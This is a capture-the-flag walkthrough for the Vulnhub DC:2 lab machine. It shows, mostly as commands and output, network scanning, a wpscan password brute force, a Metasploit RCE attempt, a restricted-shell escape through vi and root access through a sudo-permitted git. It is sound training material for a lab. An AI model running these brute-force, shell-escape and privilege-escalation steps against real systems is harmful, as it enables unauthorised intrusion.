DC: 2 Hacking Challenge Walkthrough (Vulnhub)

Hello Community!

We have just completed first vulnhub machine of DC series by DCAU in my last post. Lets move to the next challenge of the same series i.e DC:2. Like DC:1, there are many flags but the goal is to find the final flag in /root directory. According to the author, the machine is designed for beginners and knowledge of Linux Command Line is a must.

Lets Go!

Setup and Configurations

You can download the VM from the vulnhub website. Run the VM in VirtualBox (or VMware player). I ran this VM at VirtualBox with Host-only Network Configurations.

You can configure Host-only Network in Virtualbox from File > Host Network Manager as shown below:

Finding Our Target

Let’s run our Nmap to enumerate the network and find the ip address of our target.

root@kali:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-21 00:11 IST
Nmap scan report for 192.168.56.2
Host is up (0.000067s latency).
MAC Address: 08:00:27:6B:82:6D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.5
Host is up (0.00023s latency).
MAC Address: 08:00:27:9A:59:02 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.06 seconds

So 192.168.56.5 is our target’s ip (as 192.168.56.2 is for DHCP server and 192.168.56.1 is the ip of adapter or local machine as shown in Setup and Configuration).

The Attack

First we need to find out what services are running on our target machine. As usual, We will use nmap for that.

root@kali:~# nmap -p- -A 192.168.56.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-21 00:27 IST
Nmap scan report for 192.168.56.5
Host is up (0.00038s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:9A:59:02 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.56.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.34 seconds

So it has the Apache web server and SSH service running on a different port than the regular default of 22. We will first look into the web server but before doing that, we will add the following entry to the /etc/hosts file as advised by the author :

192.168.56.5 dc-2

This will map ip address to dc-2. So whenever we will open any web page like http://dc-2/xyz in our laptop,it will look into the hosts file and will know that it has to go to http://192.168.56.5/xyz.

OK! Now lets navigate to the Website. It has five pages and one is of our interest.

Flag 1 basically gives a hint that in case of dictionary attack usual word lists may not work, so we need to be cewl. Cewl? Is it cool! Well maybe, it reminded me of the tool cewl in Kali which is used for making word lists from a websites contents.

Now we need to find out the target which is prone to dictionary attack. I ran Nikto to get more info and got this.

root@kali:~# nikto -h http://dc-2 | tee nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.5
+ Target Hostname: dc-2
+ Target Port: 80
+ Start Time: 2019-05-23 00:09:02 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://dc-2/>; rel=shortlink
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7373 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2019-05-23 00:09:26 (GMT5.5) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So we have WordPress login page – wp-login.php. Yeah It may be prone to dictionary attack. Lets make a wordlist with cewl and crack the login page with wpscan.

root@kali:~# cewl -w dc.txt dc-2
CeWL 5.4.3 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

where -w is used to give word list name.

So before we can do brute force passwords, we need to know the users. Wpscan will do both the work for us in single scan. I will be listing only the relevant output ( complete output was quite large).

root@kali:~# wpscan --url http://dc-2 -P dc.txt -e
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.3.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_____________________________________________________________

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing 
[SUCCESS] - tom / parturient 
Trying admin / the Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55
Trying admin / see Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55
WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Trying admin / see Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55
Trying admin / log Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55
WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Trying admin / log Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55

[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

So three users are detected – jerry, tom and admin. Except admin user, the password for other two were cracked.

There was one more interesting entry in the output of Nikto – /wp-links-opml.php which reveals the version of wordpress.

 

It has WordPress version 4.7.10, when searching for vulnerabilities I found https://www.cvedetails.com/cve/CVE-2019-8942 – Remote Code Execution and Yeah! It has metasploit module for that! So What are we waiting for?  I used exploit/multi/http/wp_crop_rce module and exploit.

msf5 exploit(multi/http/wp_crop_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444 
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.

The target is indeed a WordPress target but we now have to find another way around.

After doing a lot of things, i finally tried logging through ssh with Tom’s credentials and it worked.

root@kali:~# ssh -p 7744 tom@dc-2
The authenticity of host '[dc-2]:7744 ([192.168.56.5]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[dc-2]:7744,[192.168.56.5]:7744' (ECDSA) to the list of known hosts.
tom@dc-2's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt usr

I tried to open the flag3.txt but what i found was cat command does not exit. Surely we are stuck with a restricted shell. I checked the PATH variable and find out that we can use vi.

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /home/tom/usr/bin
less ls scp vi
tom@DC-2:~$ vi flag3.txt

Flag3.txt gives us the folowing hint:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

We need to change user to jerry but su command is not in our allowed command’s list. Here is where the knowledge of linux and how to escape restricted shells helped me! I used vi to escape restricted shell.

~ 
~ 
~ 
:set shell=/bin/bash

and then run shell

~ 
~ 
:shell

And that worked. I now exported PATH variable so that i can execute all commands.

tom@DC-2:~$ export PATH=/bin:/usr/bin:$PATH
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

We can see that cat is working now. Lets su to jerry.

tom@DC-2:~$ su jerry
Password:

jerry@DC-2:/home/tom$ cd /home/jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

No hints now? but still : git outta here!! May be Git does not require root password. Lets check with sudo -l.

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git

Yes, Lets finish this! Help command of git comes with text editor where we can run command.

jerry@DC-2:~$ sudo git help add

And Boom!! we got a root shell.

That is it guyz. If you people have any doubt or want me to solve any particular CTF, do mention in comments.

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

Related posts

Microsoft December Patch Tuesday Arrived With 70+ Bug Fixes

NachoVPN Attack Risks Corporate VPN Clients

Anti-Spam WordPress Plugin Vulnerabilities Risked 200K+ Websites